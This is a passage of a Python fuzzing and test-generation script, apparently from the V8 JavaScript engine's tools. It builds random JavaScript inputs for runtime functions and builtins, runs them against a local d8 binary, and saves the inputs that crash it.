return self.GENERATORS[vartype][1](self, varname,
self.DEFAULT_RECURSION_BUDGET)
@staticmethod
def IsTypeSupported(typename):
return typename in Generator.GENERATORS
USUAL_SUSPECT_PROPERTIES = ["size", "length", "byteLength", "__proto__",
"prototype", "0", "1", "-1"]
DEFAULT_RECURSION_BUDGET = 2
PROXY_TRAPS = """{
getOwnPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getOwnPropertyNames: function() { return []; },
getPropertyNames: function() { return []; },
defineProperty: function(name, descriptor) {},
delete: function(name) { return true; },
fix: function() {}
}"""
def _Variable(self, name, value, fallback=None):
args = { "name": name, "value": value, "fallback": fallback }
if fallback:
wrapper = "try { %%s } catch(e) { var %(name)s = %(fallback)s; }" % args
else:
wrapper = "%s"
return [wrapper % ("var %(name)s = %(value)s;" % args)]
def _Boolean(self, name, recursion_budget):
return self._Variable(name, random.choice(["true", "false"]))
def _Oddball(self, name, recursion_budget):
return self._Variable(name,
random.choice(["true", "false", "undefined", "null"]))
def _StrictMode(self, name, recursion_budget):
return self._Variable(name, random.choice([0, 1]))
def _Int32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([-3, -1, 0, 1, 2, 10, 515, 0x3fffffff, 0x7fffffff,
0x40000000, -0x40000000, -0x80000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x80000000, 0x7fffffff)
return self._Variable(name, value)
def _Uint32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([0, 1, 2, 3, 4, 8, 0x3fffffff, 0x40000000,
0x7fffffff, 0xffffffff])
elif die < 0.75:
value = random.randint(0, 1000)
else:
value = random.randint(0, 0xffffffff)
return self._Variable(name, value)
def _Smi(self, name, recursion_budget):
die = random.random()
if die < 0.5:
value = random.choice([-5, -1, 0, 1, 2, 3, 0x3fffffff, -0x40000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x40000000, 0x3fffffff)
return self._Variable(name, value)
def _Number(self, name, recursion_budget):
die = random.random()
if die < 0.5:
return self._Smi(name, recursion_budget)
elif die < 0.6:
value = random.choice(["Infinity", "-Infinity", "NaN", "-0",
"1.7976931348623157e+308", # Max value.
"2.2250738585072014e-308", # Min value.
"4.9406564584124654e-324"]) # Min subnormal.
else:
value = random.lognormvariate(0, 15)
return self._Variable(name, value)
def _RawRandomString(self, minlength=0, maxlength=100,
alphabet=string.ascii_letters):
length = random.randint(minlength, maxlength)
result = ""
for i in xrange(length):
result += random.choice(alphabet)
return result
def _SeqString(self, name, recursion_budget):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + 'bar'
return self._Variable(name, "\"%s\" + \"%s\"" % (s1, s2))
def _SeqTwoByteString(self, name):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + unicode + 'bar'
return self._Variable(name, "\"%s\" + \"\\2082\" + \"%s\"" % (s1, s2))
def _SlicedString(self, name):
s = self._RawRandomString(20, 30)
# 'ffoo12345678901234567890'.substr(1)
return self._Variable(name, "\"%s\".substr(1)" % s)
def _ConsString(self, name):
s1 = self._RawRandomString(8, 15)
s2 = self._RawRandomString(8, 15)
# 'foo12345' + (function() { return 'bar12345';})()
return self._Variable(name,
"\"%s\" + (function() { return \"%s\";})()" % (s1, s2))
def _InternalizedString(self, name):
return self._Variable(name, "\"%s\"" % self._RawRandomString(0, 20))
def _String(self, name, recursion_budget):
die = random.random()
if die < 0.5:
string = random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._Variable(name, "\"%s\"" % string)
elif die < 0.6:
number_name = name + "_number"
result = self._Number(number_name, recursion_budget)
return result + self._Variable(name, "\"\" + %s" % number_name)
elif die < 0.7:
return self._SeqString(name, recursion_budget)
elif die < 0.8:
return self._ConsString(name)
elif die < 0.9:
return self._InternalizedString(name)
else:
return self._SlicedString(name)
def _Symbol(self, name, recursion_budget):
raw_string_name = name + "_1"
result = self._String(raw_string_name, recursion_budget)
return result + self._Variable(name, "Symbol(%s)" % raw_string_name)
def _Name(self, name, recursion_budget):
if random.random() < 0.2:
return self._Symbol(name, recursion_budget)
return self._String(name, recursion_budget)
def _JSValue(self, name, recursion_budget):
die = random.random()
raw_name = name + "_1"
if die < 0.33:
result = self._String(raw_name, recursion_budget)
return result + self._Variable(name, "new String(%s)" % raw_name)
elif die < 0.66:
result = self._Boolean(raw_name, recursion_budget)
return result + self._Variable(name, "new Boolean(%s)" % raw_name)
else:
result = self._Number(raw_name, recursion_budget)
return result + self._Variable(name, "new Number(%s)" % raw_name)
def _RawRandomPropertyName(self):
if random.random() < 0.5:
return random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._RawRandomString(0, 10)
def _AddProperties(self, name, result, recursion_budget):
propcount = random.randint(0, 3)
propname = None
for i in range(propcount):
die = random.random()
if die < 0.5:
propname = "%s_prop%d" % (name, i)
result += self._Name(propname, recursion_budget - 1)
else:
propname = "\"%s\"" % self._RawRandomPropertyName()
propvalue_name = "%s_val%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch (e) {}" %
(name, propname, propvalue_name))
if random.random() < 0.2 and propname:
# Force the object to slow mode.
result.append("delete %s[%s];" % (name, propname))
def _RandomElementIndex(self, element_name, result):
if random.random() < 0.5:
return random.randint(-1000, 1000)
result += self._Smi(element_name, 0)
return element_name
def _AddElements(self, name, result, recursion_budget):
elementcount = random.randint(0, 3)
for i in range(elementcount):
element_name = "%s_idx%d" % (name, i)
index = self._RandomElementIndex(element_name, result)
value_name = "%s_elt%d" % (name, i)
result += self._Object(value_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch(e) {}" %
(name, index, value_name))
def _AddAccessors(self, name, result, recursion_budget):
accessorcount = random.randint(0, 3)
for i in range(accessorcount):
propname = self._RawRandomPropertyName()
what = random.choice(["get", "set"])
function_name = "%s_access%d" % (name, i)
result += self._PlainFunction(function_name, recursion_budget - 1)
result.append("try { Object.defineProperty(%s, \"%s\", {%s: %s}); } "
"catch (e) {}" % (name, propname, what, function_name))
def _PlainArray(self, name, recursion_budget):
die = random.random()
if die < 0.5:
literal = random.choice(["[]", "[1, 2]", "[1.5, 2.5]",
"['a', 'b', 1, true]"])
return self._Variable(name, literal)
else:
new = random.choice(["", "new "])
length = random.randint(0, 101000)
return self._Variable(name, "%sArray(%d)" % (new, length))
def _PlainObject(self, name, recursion_budget):
die = random.random()
if die < 0.67:
literal_propcount = random.randint(0, 3)
properties = []
result = []
for i in range(literal_propcount):
propname = self._RawRandomPropertyName()
propvalue_name = "%s_lit%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
properties.append("\"%s\": %s" % (propname, propvalue_name))
return result + self._Variable(name, "{%s}" % ", ".join(properties))
else:
return self._Variable(name, "new Object()")
def _JSArray(self, name, recursion_budget):
result = self._PlainArray(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _RawRandomBufferLength(self):
if random.random() < 0.2:
return random.choice([0, 1, 8, 0x40000000, 0x80000000])
return random.randint(0, 1000)
def _JSArrayBuffer(self, name, recursion_budget):
length = self._RawRandomBufferLength()
return self._Variable(name, "new ArrayBuffer(%d)" % length)
def _JSDataView(self, name, recursion_budget):
buffer_name = name + "_buffer"
result = self._JSArrayBuffer(buffer_name, recursion_budget)
args = [buffer_name]
die = random.random()
if die < 0.67:
offset = self._RawRandomBufferLength()
args.append("%d" % offset)
if die < 0.33:
length = self._RawRandomBufferLength()
args.append("%d" % length)
result += self._Variable(name, "new DataView(%s)" % ", ".join(args),
fallback="new DataView(new ArrayBuffer(8))")
return result
def _JSDate(self, name, recursion_budget):
die = random.random()
if die < 0.25:
return self._Variable(name, "new Date()")
elif die < 0.5:
ms_name = name + "_ms"
result = self._Number(ms_name, recursion_budget)
return result + self._Variable(name, "new Date(%s)" % ms_name)
elif die < 0.75:
str_name = name + "_str"
month = random.choice(["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul",
"Aug", "Sep", "Oct", "Nov", "Dec"])
day = random.randint(1, 28)
year = random.randint(1900, 2100)
hour = random.randint(0, 23)
minute = random.randint(0, 59)
second = random.randint(0, 59)
str_value = ("\"%s %s, %s %s:%s:%s\"" %
(month, day, year, hour, minute, second))
result = self._Variable(str_name, str_value)
return result + self._Variable(name, "new Date(%s)" % str_name)
else:
components = tuple(map(lambda x: "%s_%s" % (name, x),
["y", "m", "d", "h", "min", "s", "ms"]))
return ([j for i in map(self._Int32, components) for j in i] +
self._Variable(name, "new Date(%s)" % ", ".join(components)))
def _PlainFunction(self, name, recursion_budget):
result_name = "result"
body = ["function() {"]
body += self._Object(result_name, recursion_budget - 1)
body.append("return result;\n}")
return self._Variable(name, "%s" % "\n".join(body))
def _JSFunction(self, name, recursion_budget):
result = self._PlainFunction(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSFunctionProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.createFunction(%s, function() {})" %
self.PROXY_TRAPS)
def _JSGeneratorObject(self, name, recursion_budget):
# TODO(jkummerow): Be more creative here?
return self._Variable(name, "(function*() { yield 1; })()")
def _JSMap(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sMap()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
key_name = "%s_k%d" % (name, i)
value_name = "%s_v%d" % (name, i)
if weak:
result += self._JSObject(key_name, recursion_budget - 1)
else:
result += self._Object(key_name, recursion_budget - 1)
result += self._Object(value_name, recursion_budget - 1)
result.append("%s.set(%s, %s)" % (name, key_name, value_name))
return result
def _JSMapIterator(self, name, recursion_budget):
map_name = name + "_map"
result = self._JSMap(map_name, recursion_budget)
iterator_type = random.choice(['keys', 'values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(map_name, iterator_type)))
def _JSProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.create(%s)" % self.PROXY_TRAPS)
def _JSRegExp(self, name, recursion_budget):
flags = random.choice(["", "g", "i", "m", "gi"])
string = "a(b|c)*a" # TODO(jkummerow): Be more creative here?
ctor = random.choice(["/%s/%s", "new RegExp(\"%s\", \"%s\")"])
return self._Variable(name, ctor % (string, flags))
def _JSSet(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sSet()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
element_name = "%s_e%d" % (name, i)
if weak:
result += self._JSObject(element_name, recursion_budget - 1)
else:
result += self._Object(element_name, recursion_budget - 1)
result.append("%s.add(%s)" % (name, element_name))
return result
def _JSSetIterator(self, name, recursion_budget):
set_name = name + "_set"
result = self._JSSet(set_name, recursion_budget)
iterator_type = random.choice(['values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(set_name, iterator_type)))
def _JSTypedArray(self, name, recursion_budget):
arraytype = random.choice(["Int8", "Int16", "Int32", "Uint8", "Uint16",
"Uint32", "Float32", "Float64", "Uint8Clamped"])
ctor_type = random.randint(0, 3)
if ctor_type == 0:
length = random.randint(0, 1000)
return self._Variable(name, "new %sArray(%d)" % (arraytype, length),
fallback="new %sArray(8)" % arraytype)
elif ctor_type == 1:
input_name = name + "_typedarray"
result = self._JSTypedArray(input_name, recursion_budget - 1)
return (result +
self._Variable(name, "new %sArray(%s)" % (arraytype, input_name),
fallback="new %sArray(8)" % arraytype))
elif ctor_type == 2:
arraylike_name = name + "_arraylike"
result = self._JSObject(arraylike_name, recursion_budget - 1)
length = random.randint(0, 1000)
result.append("try { %s.length = %d; } catch(e) {}" %
(arraylike_name, length))
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, arraylike_name),
fallback="new %sArray(8)" % arraytype))
else:
die = random.random()
buffer_name = name + "_buffer"
args = [buffer_name]
result = self._JSArrayBuffer(buffer_name, recursion_budget)
if die < 0.67:
offset_name = name + "_offset"
args.append(offset_name)
result += self._Int32(offset_name)
if die < 0.33:
length_name = name + "_length"
args.append(length_name)
result += self._Int32(length_name)
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, ", ".join(args)),
fallback="new %sArray(8)" % arraytype))
def _JSArrayBufferView(self, name, recursion_budget):
if random.random() < 0.4:
return self._JSDataView(name, recursion_budget)
else:
return self._JSTypedArray(name, recursion_budget)
def _JSWeakCollection(self, name, recursion_budget):
ctor = random.choice([self._JSMap, self._JSSet])
return ctor(name, recursion_budget, weak="Weak")
def _PropertyDetails(self, name, recursion_budget):
# TODO(jkummerow): Be more clever here?
return self._Int32(name)
def _JSObject(self, name, recursion_budget):
die = random.random()
if die < 0.4:
function = random.choice([self._PlainObject, self._PlainArray,
self._PlainFunction])
elif die < 0.5:
return self._Variable(name, "this") # Global object.
else:
function = random.choice([self._JSArrayBuffer, self._JSDataView,
self._JSDate, self._JSFunctionProxy,
self._JSGeneratorObject, self._JSMap,
self._JSMapIterator, self._JSRegExp,
self._JSSet, self._JSSetIterator,
self._JSTypedArray, self._JSValue,
self._JSWeakCollection])
result = function(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSReceiver(self, name, recursion_budget):
if random.random() < 0.9: return self._JSObject(name, recursion_budget)
return self._JSProxy(name, recursion_budget)
def _HeapObject(self, name, recursion_budget):
die = random.random()
if die < 0.9: return self._JSReceiver(name, recursion_budget)
elif die < 0.95: return self._Oddball(name, recursion_budget)
else: return self._Name(name, recursion_budget)
def _Object(self, name, recursion_budget):
if recursion_budget <= 0:
function = random.choice([self._Oddball, self._Number, self._Name,
self._JSValue, self._JSRegExp])
return function(name, recursion_budget)
if random.random() < 0.2:
return self._Smi(name, recursion_budget)
return self._HeapObject(name, recursion_budget)
GENERATORS = {
"Boolean": ["true", _Boolean],
"HeapObject": ["new Object()", _HeapObject],
"Int32": ["32", _Int32],
"JSArray": ["new Array()", _JSArray],
"JSArrayBuffer": ["new ArrayBuffer(8)", _JSArrayBuffer],
"JSArrayBufferView": ["new Int32Array(2)", _JSArrayBufferView],
"JSDataView": ["new DataView(new ArrayBuffer(24))", _JSDataView],
"JSDate": ["new Date()", _JSDate],
"JSFunction": ["function() {}", _JSFunction],
"JSFunctionProxy": ["Proxy.createFunction({}, function() {})",
_JSFunctionProxy],
"JSGeneratorObject": ["(function*(){ yield 1; })()", _JSGeneratorObject],
"JSMap": ["new Map()", _JSMap],
"JSMapIterator": ["new Map().entries()", _JSMapIterator],
"JSObject": ["new Object()", _JSObject],
"JSProxy": ["Proxy.create({})", _JSProxy],
"JSReceiver": ["new Object()", _JSReceiver],
"JSRegExp": ["/ab/g", _JSRegExp],
"JSSet": ["new Set()", _JSSet],
"JSSetIterator": ["new Set().values()", _JSSetIterator],
"JSTypedArray": ["new Int32Array(2)", _JSTypedArray],
"JSValue": ["new String('foo')", _JSValue],
"JSWeakCollection": ["new WeakMap()", _JSWeakCollection],
"Name": ["\"name\"", _Name],
"Number": ["1.5", _Number],
"Object": ["new Object()", _Object],
"PropertyDetails": ["513", _PropertyDetails],
"SeqOneByteString": ["\"seq 1-byte\"", _SeqString],
"SeqString": ["\"seqstring\"", _SeqString],
"SeqTwoByteString": ["\"seq \\u2082-byte\"", _SeqTwoByteString],
"Smi": ["1", _Smi],
"StrictMode": ["1", _StrictMode],
"String": ["\"foo\"", _String],
"Symbol": ["Symbol(\"symbol\")", _Symbol],
"Uint32": ["32", _Uint32],
}
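# Each GENERATORS entry maps a type name to a two-element list: a simple
# known-good JS literal (used when a simple value suffices) and the
# generator method that emits randomized variable definitions. Sketch,
# assuming dispatch goes through this table:
#   simple_literal, method = GENERATORS["JSMap"]
#   lines = method(gen, "v0", budget)  # e.g. ["var v0 = new Map()", ...,
#                                      #       "v0.set(v0_k0, v0_v0)"]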
class ArgParser(object):
def __init__(self, regex, ctor):
self.regex = regex
self.ArgCtor = ctor
class Arg(object):
def __init__(self, typename, varname, index):
self.type = typename
self.name = "_%s" % varname
self.index = index
class Function(object):
def __init__(self, match):
self.name = match.group(1)
self.argslength = -1
self.args = {}
self.inline = ""
handle_arg_parser = ArgParser(
re.compile(r"^\s*CONVERT_ARG_HANDLE_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
plain_arg_parser = ArgParser(
re.compile(r"^\s*CONVERT_ARG_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
number_handle_arg_parser = ArgParser(
re.compile(r"^\s*CONVERT_NUMBER_ARG_HANDLE_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
smi_arg_parser = ArgParser(
re.compile(r"^\s*CONVERT_SMI_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Smi", match.group(1), int(match.group(2))))
double_arg_parser = ArgParser(
re.compile(r"^\s*CONVERT_DOUBLE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
number_arg_parser = ArgParser(
re.compile(
r"^\s*CONVERT_NUMBER_CHECKED\(\w+, (\w+), (\w+), args\[(\d+)\]\)"),
lambda match: Arg(match.group(2), match.group(1), int(match.group(3))))
strict_mode_arg_parser = ArgParser(
re.compile(r"^\s*CONVERT_STRICT_MODE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("StrictMode", match.group(1), int(match.group(2))))
boolean_arg_parser = ArgParser(
re.compile(r"^\s*CONVERT_BOOLEAN_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Boolean", match.group(1), int(match.group(2))))
property_details_parser = ArgParser(
re.compile(r"^\s*CONVERT_PROPERTY_DETAILS_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("PropertyDetails", match.group(1), int(match.group(2))))
arg_parsers = [handle_arg_parser, plain_arg_parser, number_handle_arg_parser,
smi_arg_parser,
double_arg_parser, number_arg_parser, strict_mode_arg_parser,
boolean_arg_parser, property_details_parser]
def SetArgsLength(self, match):
self.argslength = int(match.group(1))
def TryParseArg(self, line):
for parser in Function.arg_parsers:
match = parser.regex.match(line)
if match:
arg = parser.ArgCtor(match)
self.args[arg.index] = arg
return True
return False
def Filename(self):
return "%s.js" % self.name.lower()
def __str__(self):
s = [self.name, "("]
argcount = self.argslength
if argcount < 0:
print("WARNING: unknown argslength for function %s" % self.name)
if self.args:
argcount = max([self.args[i].index + 1 for i in self.args])
else:
argcount = 0
for i in range(argcount):
if i > 0: s.append(", ")
s.append(self.args[i].type if i in self.args else "<unknown>")
s.append(")")
return "".join(s)
class Macro(object):
def __init__(self, match):
self.name = match.group(1)
self.args = [s.strip() for s in match.group(2).split(",")]
self.lines = []
self.indentation = 0
self.AddLine(match.group(3))
def AddLine(self, line):
if not line: return
if not self.lines:
# This is the first line, detect indentation.
self.indentation = len(line) - len(line.lstrip())
line = line.rstrip("\\\n ")
if not line: return
assert len(line[:self.indentation].strip()) == 0, \
("expected whitespace: '%s', full line: '%s'" %
(line[:self.indentation], line))
line = line[self.indentation:]
if not line: return
self.lines.append(line + "\n")
def Finalize(self):
for arg in self.args:
pattern = re.compile(r"(##|\b)%s(##|\b)" % arg)
for i in range(len(self.lines)):
self.lines[i] = re.sub(pattern, "%%(%s)s" % arg, self.lines[i])
def FillIn(self, arg_values):
filler = {}
assert len(arg_values) == len(self.args)
for i in range(len(self.args)):
filler[self.args[i]] = arg_values[i]
result = []
for line in self.lines:
result.append(line % filler)
return result
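# Sketch of the Macro lifecycle (hypothetical macro, not from the parsed
# sources): given
#   #define CHECK_PAIR(a, b) \
#     CONVERT_SMI_ARG_CHECKED(a, b)
# Finalize() rewrites the stored body to
#   "CONVERT_SMI_ARG_CHECKED(%(a)s, %(b)s)\n"
# and FillIn(["value", "0"]) then returns
#   ["CONVERT_SMI_ARG_CHECKED(value, 0)\n"]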
# Parses HEADERFILENAME to find out which runtime functions are "inline".
def FindInlineRuntimeFunctions():
inline_functions = []
with open(HEADERFILENAME, "r") as f:
inline_list = "#define INLINE_FUNCTION_LIST(F) \\\n"
inline_function = re.compile(r"^\s*F\((\w+), \d+, \d+\)\s*\\?")
mode = "SEARCHING"
for line in f:
if mode == "ACTIVE":
match = inline_function.match(line)
if match:
inline_functions.append(match.group(1))
if not line.endswith("\\\n"):
mode = "SEARCHING"
elif mode == "SEARCHING":
if line == inline_list:
mode = "ACTIVE"
return inline_functions
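# The header section this expects looks roughly like:
#   #define INLINE_FUNCTION_LIST(F) \
#     F(IsSmi, 1, 1) \
#     F(IsNonNegativeSmi, 1, 1)
# Parsing stays ACTIVE while lines end in a continuation backslash and
# records each macro's first argument as an inline function name.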
def ReadFileAndExpandMacros(filename):
found_macros = {}
expanded_lines = []
with open(filename, "r") as f:
found_macro = None
for line in f:
if found_macro is not None:
found_macro.AddLine(line)
if not line.endswith("\\\n"):
found_macro.Finalize()
found_macro = None
continue
match = MACRO.match(line)
if match:
found_macro = Macro(match)
if found_macro.name in EXPAND_MACROS:
found_macros[found_macro.name] = found_macro
else:
found_macro = None
continue
match = FIRST_WORD.match(line)
if match:
first_word = match.group(1)
if first_word in found_macros:
MACRO_CALL = re.compile(r"%s\(([^)]*)\)" % first_word)
match = MACRO_CALL.match(line)
assert match
args = [s.strip() for s in match.group(1).split(",")]
expanded_lines += found_macros[first_word].FillIn(args)
continue
expanded_lines.append(line)
return expanded_lines
# Detects runtime functions by parsing FILENAME.
def FindRuntimeFunctions():
inline_functions = FindInlineRuntimeFunctions()
functions = []
expanded_lines = ReadFileAndExpandMacros(FILENAME)
function = None
partial_line = ""
for line in expanded_lines:
# Multi-line definition support, ignoring macros.
if line.startswith("RUNTIME_FUNCTION") and not line.endswith("{\n"):
if line.endswith("\\\n"): continue
partial_line = line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if partial_line.endswith("{"):
line = partial_line
partial_line = ""
else:
continue
match = FUNCTION.match(line)
if match:
function = Function(match)
if function.name in inline_functions:
function.inline = "_"
continue
if function is None: continue
match = ARGSLENGTH.match(line)
if match:
function.SetArgsLength(match)
continue
if function.TryParseArg(line):
continue
if line == FUNCTIONEND:
if function is not None:
functions.append(function)
function = None
return functions
# Hack: This must have the same fields as class Function above, because the
# two are used polymorphically in RunFuzzer(). We could use inheritance...
class Builtin(object):
def __init__(self, match):
self.name = match.group(1)
args = match.group(2)
self.argslength = 0 if args == "" else args.count(",") + 1
self.inline = ""
self.args = {}
if self.argslength > 0:
args = args.split(",")
for i in range(len(args)):
# a = args[i].strip() # TODO: filter out /* comments */ first.
a = ""
self.args[i] = Arg("Object", a, i)
def __str__(self):
return "%s(%d)" % (self.name, self.argslength)
def FindJSBuiltins():
PATH = "src"
fileslist = []
for (root, dirs, files) in os.walk(PATH):
for f in files:
if f.endswith(".js"):
fileslist.append(os.path.join(root, f))
builtins = []
regexp = re.compile(r"^function (\w+)\s*\((.*?)\) {")
matches = 0
for filename in fileslist:
with open(filename, "r") as f:
file_contents = f.read()
file_contents = js2c.ExpandInlineMacros(file_contents)
lines = file_contents.split("\n")
partial_line = ""
for line in lines:
if line.startswith("function") and not '{' in line:
partial_line += line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if '{' in line:
line = partial_line
partial_line = ""
else:
continue
match = regexp.match(line)
if match:
builtins.append(Builtin(match))
return builtins
# Classifies runtime functions.
def ClassifyFunctions(functions):
# Can be fuzzed with a JavaScript testcase.
js_fuzzable_functions = []
# We have enough information to fuzz these, but they need inputs that
# cannot be created or passed around in JavaScript.
cctest_fuzzable_functions = []
# This script does not have enough information about these.
unknown_functions = []
types = {}
for f in functions:
if f.name in BLACKLISTED:
continue
decision = js_fuzzable_functions
custom = CUSTOM_KNOWN_GOOD_INPUT.get(f.name, None)
if f.argslength < 0:
# Unknown length -> give up unless there's a custom definition.
if custom and custom[-1] is not None:
f.argslength = custom[-1]
assert len(custom) == f.argslength + 1, \
("%s: last custom definition must be argslength" % f.name)
else:
decision = unknown_functions
else:
if custom:
# Any custom definitions must match the known argslength.
assert len(custom) == f.argslength + 1, \
("%s should have %d custom definitions but has %d" %
(f.name, f.argslength + 1, len(custom)))
for i in range(f.argslength):
if custom and custom[i] is not None:
# All good, there's a custom definition.
pass
elif not i in f.args:
# No custom definition and no parse result -> give up.
decision = unknown_functions
else:
t = f.args[i].type
if t in NON_JS_TYPES:
decision = cctest_fuzzable_functions
else:
assert Generator.IsTypeSupported(t), \
("type generator not found for %s, function: %s" % (t, f))
decision.append(f)
return (js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions)
def _GetKnownGoodArgs(function, generator):
custom_input = CUSTOM_KNOWN_GOOD_INPUT.get(function.name, None)
definitions = []
argslist = []
for i in range(function.argslength):
if custom_input and custom_input[i] is not None:
name = "arg%d" % i
definitions.append("var %s = %s;" % (name, custom_input[i]))
else:
arg = function.args[i]
name = arg.name
definitions += generator.RandomVariable(name, arg.type, simple=True)
argslist.append(name)
return (definitions, argslist)
def _GenerateTestcase(function, definitions, argslist, throws):
s = ["// Copyright 2014 the V8 project authors. All rights reserved.",
"// AUTO-GENERATED BY tools/generate-runtime-tests.py, DO NOT MODIFY",
"// Flags: --allow-natives-syntax --harmony"] + definitions
call = "%%%s%s(%s);" % (function.inline, function.name, ", ".join(argslist))
if throws:
s.append("try {")
s.append(call)
s.append("} catch(e) {}")
else:
s.append(call)
testcase = "\n".join(s)
return testcase
def GenerateJSTestcaseForFunction(function):
gen = Generator()
(definitions, argslist) = _GetKnownGoodArgs(function, gen)
testcase = _GenerateTestcase(function, definitions, argslist,
function.name in THROWS)
path = os.path.join(BASEPATH, function.Filename())
with open(path, "w") as f:
f.write("%s\n" % testcase)
def GenerateTestcases(functions):
shutil.rmtree(BASEPATH) # Re-generate everything.
os.makedirs(BASEPATH)
for f in functions:
GenerateJSTestcaseForFunction(f)
def _SaveFileName(save_path, process_id, save_file_index):
return "%s/fuzz_%d_%d.js" % (save_path, process_id, save_file_index)
def _GetFuzzableRuntimeFunctions():
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
return js_fuzzable_functions
FUZZ_TARGET_LISTS = {
"runtime": _GetFuzzableRuntimeFunctions,
"builtins": FindJSBuiltins,
}
def RunFuzzer(process_id, options, stop_running):
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.001
SLEEP_TIME_FACTOR = 1.25
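# The child d8 process is polled with exponential backoff: sleep_time
# starts at INITIAL_SLEEP_TIME, grows by SLEEP_TIME_FACTOR per poll and is
# capped at MAX_SLEEP_TIME, so crashes are detected quickly without
# busy-waiting on long-running tests.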
base_file_name = "/dev/shm/runtime_fuzz_%d" % process_id
test_file_name = "%s.js" % base_file_name
stderr_file_name = "%s.out" % base_file_name
save_file_index = 0
while os.path.exists(_SaveFileName(options.save_path, process_id,
save_file_index)):
save_file_index += 1
targets = FUZZ_TARGET_LISTS[options.fuzz_target]()
try:
for i in range(options.num_tests):
if stop_running.is_set(): break
function = None
while function is None or function.argslength == 0:
function = random.choice(targets)
args = []
definitions = []
gen = Generator()
for i in range(function.argslength):
arg = function.args[i]
argname = "arg%d%s" % (i, arg.name)
args.append(argname)
definitions += gen.RandomVariable(argname, arg.type, simple=False)
testcase = _GenerateTestcase(function, definitions, args, True)
with open(test_file_name, "w") as f:
f.write("%s\n" % testcase)
with open("/dev/null", "w") as devnull:
with open(stderr_file_name, "w") as stderr:
process = subprocess.Popen(
[options.binary, "--allow-natives-syntax", "--harmony",
"--enable-slow-asserts", test_file_name],
stdout=devnull, stderr=stderr)
end_time = time.time() + options.timeout
timed_out = False
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if time.time() >= end_time:
# Kill the process and wait for it to exit.
os.kill(process.pid, signal.SIGTERM)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
if exit_code != 0 and not timed_out:
oom = False
with open(stderr_file_name, "r") as stderr:
for line in stderr:
if line.strip() == "# Allocation failed - process out of memory":
oom = True
break
if oom: continue
save_name = _SaveFileName(options.save_path, process_id,
save_file_index)
shutil.copyfile(test_file_name, save_name)
save_file_index += 1
except KeyboardInterrupt:
stop_running.set()
finally:
if os.path.exists(test_file_name):
os.remove(test_file_name)
if os.path.exists(stderr_file_name):
os.remove(stderr_file_name)
def BuildOptionParser():
usage = """Usage: %%prog [options] ACTION
where ACTION can be:
info Print diagnostic info.
check Check that runtime functions can be parsed as expected, and that
test cases exist.
generate Parse source code for runtime functions, and auto-generate
test cases for them. Warning: this will nuke and re-create
%(path)s.
fuzz Generate fuzz tests, run them, save those that crashed (see options).
""" % {"path": os.path.relpath(BASEPATH)}
o = optparse.OptionParser(usage=usage)
o.add_option("--binary", default="out/x64.debug/d8",
help="d8 binary used for running fuzz tests (default: %default)")
o.add_option("--fuzz-target", default="runtime",
help="Set of functions targeted by fuzzing. Allowed values: "
"%s (default: %%default)" % ", ".join(FUZZ_TARGET_LISTS))
o.add_option("-n", "--num-tests", default=1000, type="int",
help="Number of fuzz tests to generate per worker process"
" (default: %default)")
o.add_option("--save-path", default="~/runtime_fuzz_output",
